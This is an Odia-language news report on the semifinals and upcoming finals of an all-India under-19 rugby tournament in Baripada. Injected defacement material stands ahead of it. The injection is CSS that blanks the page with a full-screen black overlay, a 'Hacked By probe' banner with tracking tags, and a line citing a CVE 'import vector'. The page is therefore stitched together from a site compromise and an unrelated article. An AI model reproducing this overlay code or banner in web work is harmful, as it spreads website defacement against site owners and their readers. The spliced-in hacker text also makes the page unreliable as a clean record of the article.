html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ସର୍ବ ଭାରତୀୟ ୧୯ ବର୍ଷରୁ କମ ରଗବି ପ୍ରତିଯୋଗିତା ଫାଇନାଲ  ରବିବାର 

User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 
  • ବାଳିକା ବିଭାଗରେ ଭୂବନେଶ୍ୱର କିସ ବନାମ ପଶ୍ଚିମବଙ୍ଗ ଜଙ୍ଗଲ କ୍ରୋ 

  •  ବାଳକ ବିଭାଗରେ ଦିଲ୍ଲୀ ରିବେଲସ ବନାମ ପଶ୍ଚିମବଙ୍ଗ ଜଙ୍ଗଲ କ୍ରୋ 

ବାରିପଦା(ଦିଲ୍ଲୀପ ମହାନ୍ତି )—ବାରିପଦା ତଖତପୁରସ୍ଥିତ ଆଇନ ମହାବିଦ୍ୟାଳୟ ଖେଳପଡ଼ିଆରେ ସେପ୍ଟେମ୍ବର ୫ରୁ ଆରମ୍ଭ ହୋଇଥିବା ସର୍ବ ଭାରତୀୟ ୧୯ ବର୍ଷରୁ କମ୍ ରଗ୍ବି ପ୍ରତିଯୋଗିତାର ଫାଇନାଲ ମ୍ୟାଚ ସେପ୍ଟେମ୍ବର ୯ରେ ବାରିପଦା ଷ୍ଟେସନ ବଜାର ଖେଳପଡ଼ିଆରେ ଅନୁଷ୍ଠିତ  ହେବ । ଏଥିରେ ବାଳିକା ବିଭାଗରେ  ଭୂବନେଶ୍ୱର କିସ ବନାମ ପଶ୍ଚିମବଙ୍ଗ ଜଙ୍ଗଲ କ୍ରୋ ଓ   ବାଳକ ବିଭାଗରେ ଦିଲ୍ଲୀ ରିବେଲସ ବନାମ ପଶ୍ଚିମବଙ୍ଗ ଜଙ୍ଗଲ କ୍ରୋ ଫାଇନାଲରେ ପରସ୍ପରକୁ ସମ୍ମୁଖୀନ ହେବେ । ଏହି ପରିପ୍ରେକ୍ଷୀରେ ଆୟୋଜିତ ପୁରସ୍କାର ବିତରଣୀ ଉତ୍ସବ ଓ ଉଦଯାପନୀ ସମାରୋହରେ ମୁଖ୍ୟ ଅତିଥି ଓ ସମ୍ମାନୀତ ଅତିଥିମାନେ ଚମ୍ପିଆନ ଓ ରନର୍ସ ଆପ ଟିମକୁ ଟ୍ରଫି ଆଦି ପ୍ରଦାନ କରିବେ । ଏଥି ନିମନ୍ତେ ଶନିବାର ଆଇନ ମହାବିଦ୍ୟାଳୟ ପଡ଼ିଆରେ ଆୟୋଜିତ ବାଳିକା ବିଭାଗ ସେମିଫାଇନାଲର  ପ୍ରଥମ ମ୍ୟାଚ ଦିଲ୍ଲୀ ହେରିକନେ ବନାମ ପଶ୍ଚିମବଙ୍ଗର ଜଙ୍ଗଲ କ୍ରୋ ମଧ୍ୟରେ ହୋଇଥିଲା ଓ ଜଙ୍ଗଲ କ୍ରୋ ଦିଲ୍ଲୀ ହେରିକେନକୁ ପରାସ୍ତ କରି ଫାଇନାଲରେ ପ୍ରବେଶ କରିଥିଲା ।  ସେହିପରି ଦ୍ୱିତୀୟ ମ୍ୟାଚରେ ଭୂବନେଶ୍ୱର କିସ ମହାରାଷ୍ଟ୍ରକୁ  ମଧ୍ୟରେ ହୋଇଥିଲା ଓ ମହାରାଷ୍ଟ୍ରକୁ ୨୫-୦ ଗୋଲ ବ୍ୟବଧାନରେ ହରାଇ ସିଧାସଳଖ ଫାଇନାକୁ ଯାଇଥିଲା । ବାଳକ  ବିଭାଗ ପ୍ରଥମ ମ୍ୟାଚରେ ଦିଲ୍ଲୀ ହେରିକିନ ବନାମ ଦିଲ୍ଲୀ ରିବେଲସ ମଧ୍ୟରେ ହୋଇଥିଲା ଓ ଦିଲ୍ଲୀ ରିବେଲସ ହେରିକିନକୁ ୧୭-୧୨ ଗୋଲ ବ୍ୟବଧାନରେ ପରାସ୍ତ କରି ଫାଇନାଲରେ ପ୍ରବେଶ କରିଥିବା ବେଳେ ଅନ୍ୟ ଏକ ସେମିଫାଇନାଲରେ ପଶ୍ଚିମବଙ୍ଗ ଜଙ୍ଗଲ କ୍ରୋ ମହାରାଷ୍ଟ୍ରକୁ ୧୦-୫ ଗୋଲରେ ପରାସ୍ତ କରି ଫାଇନାଲକୁ ଯାଇଥିଲା । ସେହିପରି ବାଳିକା ବିଭାଗ ପ୍ଲେଟ  ରାଙ୍କୀଙ୍ଗ  ଫାଇନାଲରେ ମୟୂରଭଞ୍ଜ ଭୂବନେଶ୍ୱରକୁ ୭-୦ ଗୋଲରେ ପରାସ୍ତ କରିଥିଲା । ବାଳକ ବିଭାଗ ପ୍ଲେଟ ଫାଇନାଲ ମ୍ୟାଚ ସହିତ କପ ଫାଇନାଲର ତୃତୀୟ ସ୍ଥାନ ନିମନ୍ତେ ଖେଳ ମଧ୍ୟ ରବିବାର ଅନୁଷ୍ଠିତ  ହେବ । ଆଜିର ସେମିଫାଇନାଲ ମ୍ୟାଚକୁ ମଣ୍ଟୁ ମଣ୍ଡଳ, ବୁଦ୍ଧଦେବ ପ୍ରଧାନ, ଈଶ୍ୱର କୋଟ୍ରାକି, ଦିବ୍ୟ ରଞ୍ଜନ ଦାସ, ବିକାଶ ଚୌରାସିଆ, ଧୀରେନ କୁମାର ରାଉତ, ସୌରଜିତ୍ ଘୋଷ, ରେହେମୁଦ୍ଧିନ ଶେଖ୍ ପ୍ରମୁଖ ପରିଚାଳନା କରିଥିଲେ । 

 

0
0
0
s2sdefault